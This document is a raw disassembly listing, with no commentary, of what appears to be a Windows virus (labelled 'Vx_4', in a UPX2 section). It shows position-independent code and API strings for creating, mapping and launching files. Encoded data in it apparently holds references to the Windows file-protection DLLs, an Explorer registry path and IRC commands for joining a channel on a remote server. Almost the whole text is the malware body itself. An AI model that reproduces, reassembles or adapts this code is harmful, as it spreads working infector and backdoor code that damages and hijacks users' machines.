dword ptr [ebp+103E82h], 0 jz loc_31439524 call near ptr loc_314392FA+1 dec esi push esp inc esp dec esp dec esp loc_314392FA: ; CODE XREF: sub_3143917E+172p add bh, bh sub_3143917E endp ; sp-analysis failed xchg eax, ebp sahf db 3Eh adc [eax], al lea esi, [ebp+1017CEh] xor ecx, ecx lea edi, [ebp+103EEAh] mov cl, 0Eh xchg eax, ebx call sub_3143958C cmp dword ptr [ebp+103F1Eh], 0 jz loc_31439524 mov eax, [ebp+103EEEh] push dword ptr [eax+1] pop dword ptr [ebp+103907h] mov eax, [ebp+103F06h] push dword ptr [eax+1] pop dword ptr [ebp+103954h] mov eax, [ebp+103EF2h] push dword ptr [eax+1] pop dword ptr [ebp+10395Bh] mov ecx, [ebp+103EF6h] jecxz short loc_31439373 push dword ptr [ecx+1] pop dword ptr [ebp+103968h] mov ecx, [ebp+103EFEh] jecxz short loc_31439373 push dword ptr [ecx+1] pop dword ptr [ebp+103975h] loc_31439373: ; CODE XREF: UPX2:31439357j ; UPX2:31439368j call sub_31439530 lea edi, [ebp+103F74h] mov ecx, edi push 0 neg cl push dword ptr [eax+4] and ecx, 3 push 40h add edi, ecx push edi push 0 push 18h lea esi, [ebp+1015DBh] mov ecx, 19h lea eax, ds:0FFFFFFFEh[ecx*2] stosw lea eax, ds:0[ecx*2] stosw lea eax, [edi+4] stosd xor ah, ah lea edx, [ebp+103E20h] loc_314393BC: ; CODE XREF: UPX2:314393C5j lodsb mov [edx], ax stosw add edx, 2 loop loc_314393BC mov edx, esp push 0 push 7318h mov ecx, esp push 0 mov eax, esp push 0 push 8000000h push 40h push ecx push edx push 0Eh push eax call dword ptr [ebp+103EFAh] pop eax add esp, 40h push 7318h mov edx, esp push 0 mov ecx, esp push 40h push 0 push 2 push edx push 0 push 7318h push 0 push ecx push 0FFFFFFFFh push eax call dword ptr [ebp+103F02h] pop edi pop ecx test edi, edi jz loc_31439524 lea esi, [ebp+101000h] mov ecx, 0CC6h mov ebp, edi rep movsd sub ebp, 101000h lea eax, [ebp+10143Ah] jmp eax ; --------------------------------------------------------------------------- dw 5450h dd 0FF6A206Ah, 3F0A95FFh, 0C0850010h, 0E834755Fh, 14Fh dd 11E8h, 44655300h, 67756265h, 76697250h, 67656C69h, 0E8570065h dd 550h, 4278B5FFh, 95FF0010h, 103E8Eh, 5295FF57h, 6A00103Eh dd 0FF026A00h, 103E8295h, 128B900h, 2B970000h, 240C89E1h dd 95FF5754h, 103EC6h, 0A583F633h, 103F62h, 0FF575400h dd 103ECA95h, 74C08500h, 0FE834666h, 0FFEE7204h, 6A082474h dd 0FF2A6A00h, 103EC295h, 74C08500h, 88E893DCh, 33000005h dd 3AE391C9h, 3F628539h, 32750010h, 24247C81h, 73727363h dd 0C1812874h, 0E9Fh, 56505450h, 53505051h, 3E7A95FFh dd 0C0850010h, 0FF0F7459h, 8F082474h, 103F6285h, 0FDC5E800h dd 0FF53FFFFh, 103E5295h, 818EEB00h, 128C4h, 95FF5700h dd 103E52h ; --------------------------------------------------------------------------- ; START OF FUNCTION CHUNK FOR sub_3143917E loc_31439524: ; CODE XREF: sub_3143917E+1Fj ; sub_3143917E+B2j ... call dword ptr [ebp+103E52h] jmp loc_314390F0 ; END OF FUNCTION CHUNK FOR sub_3143917E ; --------------------------------------------------------------------------- align 10h ; =============== S U B R O U T I N E ======================================= sub_31439530 proc near ; CODE XREF: UPX2:loc_31439373p ; sub_3143954F+2p pop edx push 0 push 0 push 0 push 0 push 40001h mov eax, esp push 0 push eax push 0Ch mov eax, esp jmp edx sub_31439530 endp ; --------------------------------------------------------------------------- aVx_4_0 db 'Vx_4',0 db 0 ; =============== S U B R O U T I N E ======================================= sub_3143954F proc near ; CODE XREF: sub_3143917E+9p xor ecx, ecx call sub_31439530 lea edx, [ebp+101549h] push edx push ecx push ecx push eax call dword ptr [ebp+103E56h] add esp, 20h retn sub_3143954F endp ; sp-analysis failed ; --------------------------------------------------------------------------- align 4 dd 585858h, 3318h, 0E63h, 1, 2 dup(0) dd 29B0h, 0 ; =============== S U B R O U T I N E ======================================= sub_3143958C proc near ; CODE XREF: sub_3143917E+7Cp ; UPX2:31439312p ... push ecx push esi push ebx call dword ptr [ebp+103E5Eh] stosd pop ecx loc_31439597: ; CODE XREF: sub_3143958C+Ej lodsb test al, al jnz short loc_31439597 loop sub_3143958C retn sub_3143958C endp ; =============== S U B R O U T I N E ======================================= sub_3143959F proc near ; CODE XREF: sub_3143B11D+25p ; FUNCTION CHUNK AT 31439629 SIZE 000003C0 BYTES ; FUNCTION CHUNK AT 314399F9 SIZE 00000027 BYTES lea edx, [ebp+101975h] push edx call dword ptr [ebp+103EB6h] mov [ebp+104278h], eax call near ptr loc_314395CC+1 dec esp outsd outsd imul esi, [ebp+70h], 50h jb short loc_31439629 jbe short near ptr loc_31439629+2 insb db 65h, 67h, 65h push esi popa insb jnz short loc_31439630 inc ecx loc_314395CC: ; CODE XREF: sub_3143959F+13p add [eax-1], dl sub_3143959F endp ; sp-analysis failed xchg eax, ebp pop esi db 3Eh adc [eax], al mov [ebp+10427Ch], eax retn ; --------------------------------------------------------------------------- db 5Ch ; \ db 42h ; B db 61h ; a db 73h ; s db 65h ; e db 4Eh ; N db 61h ; a db 6Dh ; m db 65h ; e db 64h ; d db 4Fh ; O db 62h ; b db 6Ah ; j db 65h ; e db 63h ; c db 74h ; t db 73h ; s db 5Ch ; \ db 56h ; V db 74h ; t db 53h ; S db 65h ; e db 63h ; c db 74h ; t db 0 db 6Ch ; l db 73h ; s db 74h ; t db 72h ; r db 6Ch ; l db 65h ; e db 6Eh ; n db 0 db 43h ; C db 72h ; r db 65h ; e db 61h ; a db 74h ; t db 65h ; e db 46h ; F db 69h ; i db 6Ch ; l db 65h ; e db 41h ; A db 0 db 43h ; C db 72h ; r db 65h ; e db 61h ; a db 74h ; t db 65h ; e db 46h ; F db 69h ; i db 6Ch ; l db 65h ; e db 4Dh ; M db 61h ; a db 70h ; p db 70h ; p db 69h ; i db 6Eh ; n db 67h ; g db 41h ; A db 0 db 43h ; C db 72h ; r db 65h ; e db 61h ; a db 74h ; t db 65h ; e db 50h ; P db 72h ; r db 6Fh ; o db 63h ; c db 65h ; e db 73h ; s db 73h ; s db 41h ; A ; --------------------------------------------------------------------------- ; START OF FUNCTION CHUNK FOR sub_3143959F loc_31439629: ; CODE XREF: sub_3143959F+1Fj ; sub_3143959F+21j add [ebx+72h], al db 65h popa jz short near ptr loc_31439693+2 loc_31439630: ; CODE XREF: sub_3143959F+2Aj push edx db 65h insd outsd jz short loc_3143969B push esp push 64616572h add [ebx+72h], al db 65h popa jz short near ptr loc_314396A6+2 push esp push 64616572h add [ebx+72h], al db 65h popa jz short near ptr loc_314396B2+3 push esp outsd outsd insb push 33706C65h xor dl, [ebx+6Eh] popa jo short near ptr loc_314396D1+1 push 4500746Fh js short loc_314396CF jz short near ptr loc_314396BB+1 push 64616572h add [esi+69h], al insb db 65h push esp imul ebp, [ebp+65h], 79536F54h jnb short loc_314396F0 db 65h insd push esp imul ebp, [ebp+65h], 65724600h db 65h dec esp imul esp, [edx+72h], 797261h inc edi db 65h jz short near ptr loc_314396D3+6 loc_31439693: ; CODE XREF: sub_3143959F+8Fj imul ebp, [ebp+41h], 69727474h loc_3143969B: ; CODE XREF: sub_3143959F+95j bound esi, [ebp+74h] db 65h jnb short loc_314396E2 add [edi+65h], al jz short near ptr loc_314396EB+1 loc_314396A6: ; CODE XREF: sub_3143959F+A2j imul ebp, [ebp+53h], 657A69h inc edi db 65h jz short loc_314396F8 loc_314396B2: ; CODE XREF: sub_3143959F+AFj imul ebp, [ebp+54h], 656D69h inc edi loc_314396BB: ; CODE XREF: sub_3143959F+C7j db 65h jz short near ptr loc_3143970A+1 outsd db 64h jnz short near ptr loc_31439729+5 db 65h dec eax popa outsb db 64h insb db 65h inc ecx add [edi+65h], al jz short near ptr loc_3143971D+6 loc_314396CF: ; CODE XREF: sub_3143959F+C5j db 65h insd loc_314396D1: ; CODE XREF: sub_3143959F+BEj jo short near ptr loc_31439717+2 loc_314396D3: ; CODE XREF: sub_3143959F+F1j imul ebp, [ebp+4Eh], 41656D61h add [edi+65h], al jz short near ptr loc_31439731+3 db 65h insd loc_314396E2: ; CODE XREF: sub_3143959F+FFj jo short near ptr loc_31439731+3 popa jz short near ptr loc_3143974E+1 inc ecx add [edi+65h], al loc_314396EB: ; CODE XREF: sub_3143959F+105j jz short loc_31439743 db 65h jb short near ptr loc_31439762+1 loc_314396F0: ; CODE XREF: sub_3143959F+DBj imul ebp, [edi+6Eh], 74654700h push esi loc_314396F8: ; CODE XREF: sub_3143959F+110j db 65h jb short near ptr loc_3143976C+2 imul ebp, [edi+6Eh], 417845h inc edi db 65h jz short near ptr loc_3143975B+1 outsd insb jnz short near ptr loc_31439771+6 loc_3143970A: ; CODE XREF: sub_3143959F:loc_314396BBj db 65h dec ecx outsb outsw jb short near ptr loc_3143977C+2 popa jz short near ptr loc_3143977C+1 outsd outsb inc ecx loc_31439717: ; CODE XREF: sub_3143959F:loc_314396D1j add [edi+ebp*2+61h], cl db 64h dec esp loc_3143971D: ; CODE XREF: sub_3143959F+12Ej imul esp, [edx+72h], 41797261h add [ebp+61h], cl jo short loc_3143977F loc_31439729: ; CODE XREF: sub_3143959F+120j imul esp, [ebp+77h], 6946664Fh insb loc_31439731: ; CODE XREF: sub_3143959F+13Fj ; sub_3143959F:loc_314396E2j add gs:[edi+70h], cl outs dx, byte ptr gs:[esi] inc esi imul ebp, [ebp+4Dh], 69707061h outsb db 67h inc ecx loc_31439743: ; CODE XREF: sub_3143959F:loc_314396EBj add [edi+70h], cl outs dx, byte ptr gs:[esi] push eax jb short near ptr loc_314397B9+1 arpl [ebp+73h], sp loc_3143974E: ; CODE XREF: sub_3143959F+146j jnb short $+2 push eax jb short loc_314397C2 arpl [ebp+73h], sp jnb short near ptr loc_31439784+7 xor al, [esi+69h] loc_3143975B: ; CODE XREF: sub_3143959F+164j jb short near ptr loc_314397CA+6 jz short $+2 push eax jb short near ptr loc_314397CA+7 loc_31439762: ; CODE XREF: sub_3143959F+14Ej arpl [ebp+73h], sp jnb short near ptr loc_31439799+1 xor cl, [esi+65h] js short near ptr loc_314397DC+4 loc_3143976C: ; CODE XREF: sub_3143959F:loc_314396F8j add [ebx+65h], dl jz short near ptr loc_314397B5+2 loc_31439771: ; CODE XREF: sub_3143959F+169j imul ebp, [ebp+41h], 69727474h bound esi, [ebp+74h] loc_3143977C: ; CODE XREF: sub_3143959F+173j ; sub_3143959F+170j db 65h jnb short loc_314397C0 loc_3143977F: ; CODE XREF: sub_3143959F+188j add [ebx+65h], dl jz short loc_314397CA loc_31439784: ; CODE XREF: sub_3143959F+1B7j imul ebp, [ebp+54h], 656D69h push ebx insb db 65h, 65h jo short $+4 push ebx jns short loc_31439808 jz short loc_314397FC insd push esp loc_31439799: ; CODE XREF: sub_3143959F+1C6j imul ebp, [ebp+65h], 69466F54h insb db 65h push esp imul ebp, [ebp+65h], 6D6E5500h popa jo short loc_31439803 imul esp, [ebp+77h], 6946664Fh insb loc_314397B5: ; CODE XREF: sub_3143959F+1D0j add gs:[esi+69h], dl loc_314397B9: ; CODE XREF: sub_3143959F+1AAj jb short near ptr loc_3143982E+1 jnz short loc_3143981E insb inc ecx insb loc_314397C0: ; CODE XREF: sub_3143959F:loc_3143977Cj insb outsd loc_314397C2: ; CODE XREF: sub_3143959F+1B2j arpl [eax], ax push edi jb short loc_31439830 jz short loc_3143982E inc esi loc_314397CA: ; CODE XREF: sub_3143959F+1E3j ; sub_3143959F:loc_3143975Bj ... imul ebp, [ebp+0], 6441744Eh push 75h jnb short loc_3143984A push eax jb short near ptr loc_3143983F+3 jbe short near ptr loc_3143983F+5 insb loc_314397DC: ; CODE XREF: sub_3143959F+1CBj db 65h, 67h, 65h jnb near ptr 9835h outsd imul esp, [ebp+6Eh], 0 dec esi jz short near ptr loc_3143982B+1 jb short near ptr loc_3143984F+1 popa jz short loc_31439853 inc esi imul ebp, [ebp+0], 7243744Eh db 65h popa jz short loc_31439860 push eax loc_314397FC: ; CODE XREF: sub_3143959F+1F6j jb short loc_3143986D arpl [ebp+73h], sp jnb short $+2 loc_31439803: ; CODE XREF: sub_3143959F+20Cj dec esi jz short near ptr loc_31439846+3 jb short loc_3143986D loc_31439808: ; CODE XREF: sub_3143959F+1F4j popa jz short loc_31439870 push eax jb short loc_3143987D arpl [ebp+73h], sp jnb short near ptr loc_31439853+5 js short $+2 dec esi jz short loc_3143985B jb short loc_3143987F popa jz short near ptr loc_3143987F+3 push ebx loc_3143981E: ; CODE XREF: sub_3143959F+21Cj arpl gs:[ecx+ebp*2+6Fh], si outsb add [esi+74h], cl inc ebx jb short near ptr loc_3143988E+1 popa loc_3143982B: ; CODE XREF: sub_3143959F+248j jz short loc_31439892 push ebp loc_3143982E: ; CODE XREF: sub_3143959F+228j ; sub_3143959F:loc_314397B9j jnb short near ptr loc_31439894+1 loc_31439830: ; CODE XREF: sub_3143959F+226j jb short near ptr loc_3143987F+3 jb short loc_314398A3 arpl [ebp+73h], sp jnb short $+2 dec esi jz short loc_31439889 popa jo short near ptr loc_31439894+1 loc_3143983F: ; CODE XREF: sub_3143959F+238j ; sub_3143959F+23Aj imul esp, [ebp+77h], 6553664Fh loc_31439846: ; CODE XREF: sub_3143959F+265j arpl [ecx+ebp*2+6Fh], si loc_3143984A: ; CODE XREF: sub_3143959F+235j outsb add [esi+74h], cl dec edi loc_3143984F: ; CODE XREF: sub_3143959F+24Aj jo short loc_314398B6 outsb inc esi loc_31439853: ; CODE XREF: sub_3143959F+24Dj ; sub_3143959F+272j imul ebp, [ebp+0], 704F744Eh loc_3143985B: ; CODE XREF: sub_3143959F+277j outs dx, byte ptr gs:[esi] push eax jb short loc_314398CF loc_31439860: ; CODE XREF: sub_3143959F+25Aj arpl [ebp+73h], sp jnb short loc_314398B9 outsd imul esp, [ebp+6Eh], 0 dec esi jz short near ptr loc_314398BB+1 loc_3143986D: ; CODE XREF: sub_3143959F:loc_314397FCj ; sub_3143959F+267j jo short near ptr loc_314398D3+1 outsb loc_31439870: ; CODE XREF: sub_3143959F+26Aj push ebx arpl gs:[ecx+ebp*2+6Fh], si outsb add [esi+74h], cl push eax jb short near ptr loc_314398EB+1 loc_3143987D: ; CODE XREF: sub_3143959F+26Dj jz short near ptr loc_314398E3+1 loc_3143987F: ; CODE XREF: sub_3143959F+279j ; sub_3143959F+27Cj ... arpl [esi+edx*2+69h], si jb short loc_314398F9 jnz short near ptr loc_314398E7+1 insb dec ebp loc_31439889: ; CODE XREF: sub_3143959F+29Bj db 65h insd outsd jb short near ptr loc_31439904+3 loc_3143988E: ; CODE XREF: sub_3143959F+289j add [esi+74h], cl push ecx loc_31439892: ; CODE XREF: sub_3143959F:loc_3143982Bj jnz short loc_314398F9 loc_31439894: ; CODE XREF: sub_3143959F:loc_3143982Ej ; sub_3143959F+29Ej jb short near ptr loc_3143990E+1 dec ecx outsb outsw jb short near ptr loc_31439908+1 popa jz short loc_31439908 outsd outsb push esp outsd loc_314398A3: ; CODE XREF: sub_3143959F+293j imul esp, [ebp+6Eh], 0 dec esi jz short near ptr loc_314398FF+2 jb short loc_31439915 jz short near ptr loc_31439912+1 push esi imul esi, [edx+74h], 4D6C6175h loc_314398B6: ; CODE XREF: sub_3143959F:loc_3143984Fj db 65h insd outsd loc_314398B9: ; CODE XREF: sub_3143959F+2C4j jb short loc_31439934 loc_314398BB: ; CODE XREF: sub_3143959F+2CCj add [edx+74h], dl insb push ebp outsb imul esp, [ebx+6Fh], 74536564h jb short near ptr loc_31439931+2 outsb db 67h push esp outsd inc ecx loc_314398CF: ; CODE XREF: sub_3143959F+2BFj outsb jnb short near ptr loc_3143993A+1 push ebx loc_314398D3: ; CODE XREF: sub_3143959F:loc_3143986Dj jz short loc_31439947 imul ebp, [esi+67h], 41535700h push ebx jz short loc_31439940 jb short loc_31439955 jnz short near ptr loc_31439952+1 loc_314398E3: ; CODE XREF: sub_3143959F:loc_3143987Dj add [ebx+6Ch], ah outsd loc_314398E7: ; CODE XREF: sub_3143959F+2E6j jnb short loc_3143994E jnb short near ptr loc_31439959+1 loc_314398EB: ; CODE XREF: sub_3143959F+2DCj arpl [ebx+65h], bp jz short $+2 arpl [edi+6Eh], bp outsb arpl gs:[eax+eax+67h], si loc_314398F9: ; CODE XREF: sub_3143959F+2E4j ; sub_3143959F:loc_31439892j db 65h jz short near ptr loc_31439963+1 outsd jnb short near ptr loc_31439971+2 loc_314398FF: ; CODE XREF: sub_3143959F+309j bound edi, [ecx+6Eh] popa insd loc_31439904: ; CODE XREF: sub_3143959F+2EDj add gs:[edx+65h], dh loc_31439908: ; CODE XREF: sub_3143959F+2FEj ; sub_3143959F+2FBj arpl [esi+0], si jnb short near ptr loc_31439971+1 outsb loc_3143990E: ; CODE XREF: sub_3143959F:loc_31439894j add fs:[ebx+6Fh], dh loc_31439912: ; CODE XREF: sub_3143959F+30Dj arpl [ebx+65h], bp loc_31439915: ; CODE XREF: sub_3143959F+30Bj jz short $+2 dec ecx outsb jz short loc_31439980 jb short loc_3143998B db 65h jz short loc_31439963 insb outsd jnb short near ptr loc_31439988+1 dec eax popa outsb db 64h insb add gs:[ecx+6Eh], cl jz short loc_31439994 jb short near ptr loc_3143999E+1 loc_31439931: ; CODE XREF: sub_3143959F+329j db 65h jz short loc_3143997B loc_31439934: ; CODE XREF: sub_3143959F:loc_314398B9j db 65h jz short loc_3143997A outsd outsb outsb loc_3143993A: ; CODE XREF: sub_3143959F+331j arpl gs:[ebp+64h], si push ebx loc_31439940: ; CODE XREF: sub_3143959F+33Ej jz short near ptr loc_314399A2+1 jz short loc_314399A9 add [ecx+6Eh], cl loc_31439947: ; CODE XREF: sub_3143959F:loc_314398D3j jz short near ptr loc_314399AC+2 jb short loc_314399B9 db 65h jz short near ptr loc_3143999B+2 loc_3143994E: ; CODE XREF: sub_3143959F:loc_314398E7j jo short loc_314399B5 outsb inc ecx loc_31439952: ; CODE XREF: sub_3143959F+342j add [ecx+6Eh], cl loc_31439955: ; CODE XREF: sub_3143959F+340j jz short near ptr loc_314399BB+1 jb short loc_314399C7 loc_31439959: ; CODE XREF: sub_3143959F+34Aj db 65h jz short near ptr loc_314399AA+1 jo short loc_314399C3 outsb push ebp jb short near ptr loc_314399CC+2 inc ecx loc_31439963: ; CODE XREF: sub_3143959F+37Ej ; sub_3143959F:loc_314398F9j add [ecx+6Eh], cl jz short near ptr loc_314399CC+1 jb short loc_314399D8 db 65h jz short near ptr loc_314399BE+1 db 65h popa db 64h inc esi loc_31439971: ; CODE XREF: sub_3143959F+36Cj ; sub_3143959F+35Ej imul ebp, [ebp+0], 41564441h push eax loc_3143997A: ; CODE XREF: sub_3143959F:loc_31439934j dec ecx loc_3143997B: ; CODE XREF: sub_3143959F:loc_31439931j xor esi, [edx] db 2Eh inc esp dec esp loc_31439980: ; CODE XREF: sub_3143959F+37Aj dec esp add [edx+65h], dl db 67h inc ebx insb outsd loc_31439988: ; CODE XREF: sub_3143959F+383j jnb short near ptr loc_314399ED+2 dec ebx loc_3143998B: ; CODE XREF: sub_3143959F+37Cj db 65h jns short $+3 push edx db 65h, 67h dec edi jo short loc_314399F9 loc_31439994: ; CODE XREF: sub_3143959F+38Ej outsb dec ebx db 65h jns short near ptr loc_314399DC+2 js short loc_314399DC loc_3143999B: ; CODE XREF: sub_3143959F+3ACj add [edx+65h], dl loc_3143999E: ; CODE XREF: sub_3143959F+390j db 67h push ecx jnz short loc_31439A07 loc_314399A2: ; CODE XREF: sub_3143959F:loc_31439940j jb short near ptr loc_31439A1C+1 push esi popa insb jnz short near ptr loc_31439A0D+1 loc_314399A9: ; CODE XREF: sub_3143959F+3A3j inc ebp loc_314399AA: ; CODE XREF: sub_3143959F:loc_31439959j js short loc_314399ED loc_314399AC: ; CODE XREF: sub_3143959F:loc_31439947j add [edx+65h], dl db 67h push ebx db 65h jz short loc_31439A0A popa loc_314399B5: ; CODE XREF: sub_3143959F:loc_3143994Ej insb jnz short near ptr loc_31439A1C+1 inc ebp loc_314399B9: ; CODE XREF: sub_3143959F+3AAj js short loc_314399FC loc_314399BB: ; CODE XREF: sub_3143959F:loc_31439955j add [esi+33h], dl loc_314399BE: ; CODE XREF: sub_3143959F+3CBj imul byte ptr [edx+2] push esi push esi loc_314399C3: ; CODE XREF: sub_3143959F+3BDj mov edx, esp push 1 loc_314399C7: ; CODE XREF: sub_3143959F+3B8j push edx push dword ptr [edx+18h] push esi loc_314399CC: ; CODE XREF: sub_3143959F+3C7j ; sub_3143959F+3C1j call dword ptr [ebp+10427Ch] mov eax, esp push esi push esi push esi push eax loc_314399D8: ; CODE XREF: sub_3143959F+3C9j push esi push dword ptr [eax+18h] loc_314399DC: ; CODE XREF: sub_3143959F+3FAj ; sub_3143959F+3F7j call dword ptr [ebp+103EEAh] add esp, 10h pop esi retn 8 ; END OF FUNCTION CHUNK FOR sub_3143959F ; --------------------------------------------------------------------------- db 8Dh ; db 49h ; I db 0FBh ; db 2Bh ; + ; --------------------------------------------------------------------------- loc_314399ED: ; CODE XREF: sub_3143959F:loc_314399AAj ; sub_3143959F:loc_31439988j enter 6851h, 0 ; --------------------------------------------------------------------------- db 0 db 0 db 0E8h ; db 8Dh ; db 4Ch ; L db 24h ; $ db 3 db 6Ah ; j ; --------------------------------------------------------------------------- ; START OF FUNCTION CHUNK FOR sub_3143959F loc_314399F9: ; CODE XREF: sub_3143959F+3F3j add [edx+5], ch loc_314399FC: ; CODE XREF: sub_3143959F:loc_314399B9j push ecx push eax push ebx push 5 mov ecx, esp push eax mov edx, esp push eax loc_31439A07: ; CODE XREF: sub_3143959F+401j push esp push 40h loc_31439A0A: ; CODE XREF: sub_3143959F+412j push ecx push edx push ebx loc_31439A0D: ; CODE XREF: sub_3143959F+408j call dword ptr [ebp+103F12h] add esp, 0Ch call dword ptr [ebp+103F1Ah] loc_31439A1C: ; CODE XREF: sub_3143959F:loc_314399A2j ; sub_3143959F+417j add esp, 8 retn ; END OF FUNCTION CHUNK FOR sub_3143959F ; --------------------------------------------------------------------------- db 8Dh ; db 95h ; db 20h db 3Eh ; > db 10h db 0 db 33h ; 3 db 0C9h ; db 6Ah ; j db 0 db 52h ; R db 68h ; h db 30h ; 0 db 0 db 32h ; 2 db 0 db 8Bh ; db 0C4h ; db 51h ; Q db 51h ; Q db 6Ah ; j db 40h ; @ db 50h ; P db 51h ; Q db 6Ah ; j db 18h db 83h ; db 0C0h ; db 8 db 54h ; T db 6Ah ; j db 0Eh db 50h ; P db 0FFh db 95h ; db 0Eh db 3Fh ; ? db 10h db 0 db 83h ; db 0C4h ; db 20h db 33h ; 3 db 0D2h ; db 85h ; db 0C0h ; db 0Fh db 99h ; db 0C2h ; db 0F7h ; db 0DAh ; db 58h ; X db 23h ; # db 0C2h ; db 0C3h ; db 57h ; W db 33h ; 3 db 0FFh db 0E8h ; db 0C1h ; db 0FFh db 0FFh db 0FFh db 0Fh db 84h ; db 0A5h ; db 0 db 0 db 0 db 50h ; P db 68h ; h db 18h db 73h ; s db 0 db 0 db 8Bh ; db 0D4h ; db 6Ah ; j db 0 db 8Bh ; db 0CCh ; db 6Ah ; j db 40h ; @ db 68h ; h db 0 db 0 db 10h db 0 db 6Ah ; j db 2 db 52h ; R db 6Ah ; j db 0 db 68h ; h db 18h db 73h ; s db 0 db 0 db 6Ah ; j db 0 db 51h ; Q db 53h ; S db 50h ; P db 0FFh db 95h ; db 2 db 3Fh ; ? db 10h db 0 db 5Fh ; _ db 59h ; Y db 0FFh db 95h ; db 52h ; R db 3Eh ; > db 10h db 0 db 85h ; db 0FFh db 74h ; t db 71h ; q db 8Bh ; db 8Dh ; db 80h ; db 15h db 10h db 0 db 0E3h ; db 0Ch db 8Dh ; db 95h ; db 0 db 10h db 10h db 0 db 3 db 0D1h ; db 57h ; W db 53h ; S db 0FFh db 0D2h ; db 8Bh ; db 85h ; db 0EEh ; db 3Eh ; > db 10h db 0 db 8Dh ; db 8Fh ; db 6 db 29h ; ) db 0 db 0 db 0E8h ; db 2Bh ; + db 0FFh db 0FFh db 0FFh db 8Bh ; db 85h ; db 6 db 3Fh ; ? db 10h db 0 db 8Dh ; db 8Fh ; db 53h ; S db 29h ; ) db 0 db 0 db 0E8h ; db 1Ah db 0FFh db 0FFh db 0FFh db 8Bh ; db 85h ; db 0F2h ; db 3Eh ; > db 10h db 0 db 8Dh ; db 8Fh ; db 5Ah ; Z db 29h ; ) db 0 db 0 db 0E8h ; db 9 db 0FFh db 0FFh db 0FFh db 8Bh ; db 85h ; db 0F6h ; db 3Eh ; > db 10h db 0 db 85h ; db 0C0h ; db 74h ; t db 20h db 8Dh ; db 8Fh ; db 67h ; g db 29h ; ) db 0 db 0 db 0E8h ; db 0F4h ; db 0FEh ; db 0FFh db 0FFh db 8Bh ; db 85h ; db 0FEh ; db 3Eh ; > db 10h db 0 db 85h ; db 0C0h ; db 74h ; t db 0Bh db 8Dh ; db 8Fh ; db 74h ; t db 29h ; ) db 0 db 0 db 0E8h ; db 0DFh ; db 0FEh ; db 0FFh db 0FFh db 8Bh ; db 0C7h ; db 5Fh ; _ db 0C3h ; db 55h ; U db 0E8h ; db 0 db 0 db 0 db 0 ; --------------------------------------------------------------------------- pop ebp sub ebp, 101B14h xor ecx, ecx lea eax, [ebp+101E9Fh] push ecx push esp push ecx push ecx push eax push ecx push ecx call dword ptr [ebp+103E7Eh] xchg eax, [esp] call dword ptr [ebp+103E52h] pop ebp retn 4 ; --------------------------------------------------------------------------- db 55h, 0E8h, 0 dd 5D000000h, 1B43ED81h, 0FF6A0010h, 1B0E958Dh, 52500010h dd 2420CDh, 0C483002Ah, 85C7660Ch, 101B54h, 85C720CDh dd 101B56h, 2A0024h, 1A6AC35Dh, 9E858h, 428D0000h, 0C9FEAA61h dd 69C3F075h, 103F6C95h, 8840500h, 95894208h, 103F6Ch dd 55C3E2F7h, 0E8h, 0ED815D00h, 101B9Dh, 3F709D8Bh, 7C830010h dd 0F000824h, 0B984h, 8EC8100h, 54000002h, 10468h, 0A695FF00h dd 8B00103Eh, 24848DFCh, 104h, 0E8006A50h, 4, 525256h dd 0A295FF57h, 3300103Eh, 4978DC9h, 51000001h, 51026A51h dd 68016Ah, 52400000h, 3E6E95FFh, 85960010h, 505B74F6h dd 1046854h, 0FF570000h, 22024B4h, 95FF0000h, 103F4Eh dd 74C08559h, 5014E316h, 6AD48Bh, 56575152h, 3EE695FFh dd 85590010h, 56D075C0h, 3E5295FFh, 578D0010h, 6A575244h dd 978D5844h, 104h, 6AC033ABh, 0ABF35910h, 50505050h, 52505050h dd 3E7695FFh, 0C4810010h, 208h, 82474FFh, 3F3E95FFh, 0FF530010h dd 103F3E95h, 4C25D00h, 0A3E8000h, 8B460175h, 10157C8Dh dd 8D19E300h, 10100095h, 56D10300h, 0C084D2FFh, 11F880Fh dd 840F0000h, 110h, 753A3E80h, 3E804610h, 1840F00h, 80000001h dd 0F175203Eh, 503E8146h, 75474E49h, 0C6CF8B42h, 2B4F0146h dd 6A51CEh, 0FF535651h, 103F3695h, 0C13B5900h, 0DF850Fh dd 858D0000h, 101E93h, 0C68006Ah, 50000000h, 3695FF53h dd 3D00103Fh, 0Ch, 0BF850Fh, 0B1E90000h, 81000000h, 4952503Eh dd 0A5850F56h, 83000000h, 3CAC08C6h, 99840F0Dh, 3C000000h dd 0ACF37520h, 850F3A3Ch, 8Ch, 20200DADh, 213D2020h, 75746567h dd 203CAC7Fh, 7E817C75h, 746820FFh, 81717574h, 3A70037Eh dd 68752F2Fh, 0FF47C6h, 10BA310Fh, 0F7000027h, 95FF52E2h dd 103ED6h, 5050C033h, 9E85050h, 44000000h, 6C6E776Fh dd 64616Fh, 3F4695FFh, 0C0850010h, 0C9333674h, 3F708589h dd 68510010h, 80000200h, 50565151h, 3F4A95FFh, 958D0010h dd 101B97h, 54C93350h, 51525051h, 7E95FF51h, 8700103Eh dd 95FF2404h, 103E52h, 8D80C3F8h, 10156Fh, 6AC3F901h, 0FF016A01h dd 473FF33h, 0C08515FFh, 0DB335A74h, 0BB3D08Bh, 8D3C5003h dd 101DBBB5h, 0CBA8B00h, 8B000001h, 1088Ah, 2BF80300h dd 0CB8B60CBh, 7461A6F3h, 0F5E24705h, 0C7832EEBh, 0CC8B530Fh dd 50D48B57h, 51406A54h, 0FFFF6A52h, 103F1295h, 868D8B00h dd 8300103Eh, 0CF2B0CC4h, 0C707E983h, 0E8006A07h, 34F8900h dd 464F53C3h, 52415754h, 694D5C45h, 736F7263h, 5C74666Fh dd 646E6957h, 5C73776Fh, 72727543h, 56746E65h, 69737265h dd 455C6E6Fh, 6F6C7078h, 726572h, 67726154h, 6F487465h dd 2007473h, 55500000h, 703C8972h, 69786F72h, 72692E6Dh dd 6C616763h, 2E797861h, 4E006C70h, 204B4349h, 62627075h dd 6F616D63h, 4553550Ah, 4A792052h, 204E494Fh, 72697626h dd 550A7574h, 0E8h, 0ED815D00h, 101EA5h, 156F85C6h, 0FF000010h dd 103EAA95h, 1FE8C100h, 1E6A3C74h, 3E62B58Bh, 0AC590010h dd 2A752E3Ch, 0FF3E8166h, 8D23751Dh, 103F66BDh, 2768B00h dd 0A566A557h, 38DC858Dh, 858F0010h, 103902h, 0FA4689FAh dd 0FBFE4E8Ch, 0CFE201B1h, 21E850EBh, 83FFFFFBh, 408247Ch dd 8E84475h, 53000000h, 442E4346h, 0FF004C4Ch, 103EB695h dd 74C00B00h, 26A930Dh, 5E95FF53h, 0FF00103Eh, 97E893D0h dd 0E8FFFFFEh, 0Bh, 5F434653h, 442E534Fh, 0FF004C4Ch, 